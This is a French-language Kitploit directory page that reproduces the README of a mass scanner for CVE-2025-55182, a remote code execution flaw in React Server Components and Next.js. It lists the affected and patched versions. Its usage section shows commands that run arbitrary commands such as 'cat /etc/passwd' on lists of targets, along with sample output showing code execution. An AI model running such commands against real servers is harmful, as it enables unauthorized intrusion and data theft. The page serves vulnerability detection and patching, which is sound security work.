Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182-Scanner — Scanner automatisé pour CVE-2025-55182 : une vulnérabilité RCE critique dans React Server Components et Next.js. | Kitploit
Outils/GitHubGitHub/qixinlee/cve-2025-55182-scanner
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubqixinlee/cve-2025-55182-scanner

CVE-2025-55182-Scanner

Scanner automatisé pour CVE-2025-55182 : une vulnérabilité RCE critique dans React Server Components et Next.js.

Voir le dépôt
12il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 RCE Scanner

Outil de détection et de vérification en masse pour la vulnérabilité d'exécution de code à distance CVE-2025-55182 (React2Shell).

⚠️ Vulnérabilité critique CVSS 10.0 | Affecte React Server Components et Next.js versions 15.x/16.x | Utilisation réservée aux tests de sécurité autorisés

Introduction à la vulnérabilité

CVE-2025-55182 (également connu sous le nom de "React2Shell") est une vulnérabilité d'exécution de code à distance (RCE) non authentifiée avec un score CVSS 10.0 critique maximal.

Cette vulnérabilité provient d'un problème de désérialisation non sécurisée dans le package react-server de React Server Components (RSC) lors du traitement du protocole RSC "Flight". Un attaquant peut exécuter du code arbitraire sur le serveur vulnérable en envoyant une requête HTTP spécialement conçue.

Comme Next.js utilise le protocole RSC "Flight", même les applications configurées par défaut avec create-next-app peuvent être exploitées sans que le développeur ait besoin d'écrire du code supplémentaire. Depuis le 5 décembre 2025, une exploitation active de cette vulnérabilité a été détectée.

Versions affectées

Versions affectées de React Server Components :

PaquetVersion affectée
react-server-dom-webpack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-turbopack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-parcel19.0.0, 19.1.0, 19.1.1, 19.2.0

Versions affectées de Next.js (avec App Router) :

Autres frameworks/outils RSC potentiellement affectés :

  • react-router
  • waku
  • @parcel/rsc
  • @vitejs/plugin-rsc
  • rwsdk
  • RedwoodJS (mode RSC)

Mesures d'atténuation temporaires

⚠️ Note importante : il n'existe aucune mesure d'atténuation temporaire connue pour cette vulnérabilité ; la mise à niveau vers une version sécurisée est la seule solution de correction.

Versions de mise à niveau recommandées :

  • React : passer à 19.0.1, 19.1.2 ou 19.2.1
  • Next.js : passer à 16.0.7, 15.5.7, 15.4.8 ou 15.3.6

Le package npm fix-react2shell-next fourni officiellement peut être utilisé pour aider à mettre à jour les applications Next.js affectées.

Installation des dépendances

root@kitploit:~
pip install requests

Utilisation

Utilisation de base

root@kitploit:~
# Scan par lots (lecture des cibles depuis urls.txt)
python CVE-2025-55182.py -f urls.txt

# Test d'une seule cible
python CVE-2025-55182.py -u http://192.168.1.100:3000

Commandes personnalisées

root@kitploit:~
# Exécute la commande whoami
python CVE-2025-55182.py -f urls.txt -c "whoami"

# Exécute la commande hostname
python CVE-2025-55182.py -u http://target.com -c "hostname"

# Lit un fichier
python CVE-2025-55182.py -f urls.txt -c "cat /etc/passwd"

Options avancées

root@kitploit:~
# Spécifie le nombre de threads et le délai d'attente
python CVE-2025-55182.py -f urls.txt -t 50 --timeout 15

# Fichier de sortie personnalisé
python CVE-2025-55182.py -f urls.txt -o scan_results.csv

# Mode silencieux (affiche uniquement les URL vulnérables)
python CVE-2025-55182.py -f urls.txt -q

Description des paramètres

Format du fichier URL

Une URL par ligne, par exemple :

root@kitploit:~
http://192.168.1.10:3000
http://192.168.1.11:3000

Exemple de sortie

root@kitploit:~
    +---------------------------------------------------------------+
    |   ###   ## #######  ##  ## ########       ## #######          |
    |   ####  ## ##       ## ##     ##          ## ##               |
    |   ## ## ## #####     ###      ##          ## #######          |
    |   ##  #### ##       ## ##     ##      ##  ##       ##         |
    |   ##   ### ####### ##   ##    ##       ####  #######          |
    |                                                               |
    |   CVE-2025-55182 RCE Scanner                                  |
    +---------------------------------------------------------------+

============================================================
  [ CONFIGURATION ]
============================================================
  > Targets: 10
  > Threads: 20
  > Command: id

============================================================
  [ SCANNING ]
============================================================
  [14:30:25] [VULN] http://192.168.1.10:3000
             '--> uid=1000(www-data)
  [14:30:26] [SAFE] http://192.168.1.11:3000

+==========================================================+
|                     SCAN COMPLETE                        |
+==========================================================+
|  Total Targets :    10                                   |
|  Vulnerable    :     1                                   |
|  Safe          :     9                                   |
|  Errors        :     0                                   |
+==========================================================+

Fichier de sortie

Les résultats du scan sont enregistrés au format CSV, avec les champs suivants :

  • url - URL cible
  • status - Code d'état HTTP
  • vulnerable - Est vulnérable
  • output - Sortie de l'exécution de la commande
  • error - Message d'erreur

Avertissement

Cet outil est uniquement destiné à des tests de sécurité autorisés. Ne pas l'utiliser à des fins illégales. L'utilisateur assume l'entière responsabilité.

Télécharger l’outil
Version majeurePlage de version affectéeVersion corrigée
16.0.x≤ 16.0.616.0.7
15.5.x≤ 15.5.615.5.7
15.4.x≤ 15.4.715.4.8
15.3.x≤ 15.3.515.3.6
15.2.x≤ 15.2.5-
15.1.x≤ 15.1.8-
15.0.x≤ 15.0.4-
14.x Canary≥ 14.3.0-canary.77-
ParamètreDescriptionValeur par défaut
-f, --fileFichier de liste d'URLurls.txt
-u, --urlURL cible unique-
-t, --threadsNombre de threads simultanés20
--timeoutDélai d'attente de requête (secondes)10
-o, --outputFichier CSV de sortieresults.csv
-c, --commandCommande à exécuterid
-q, --quietMode silencieuxfalse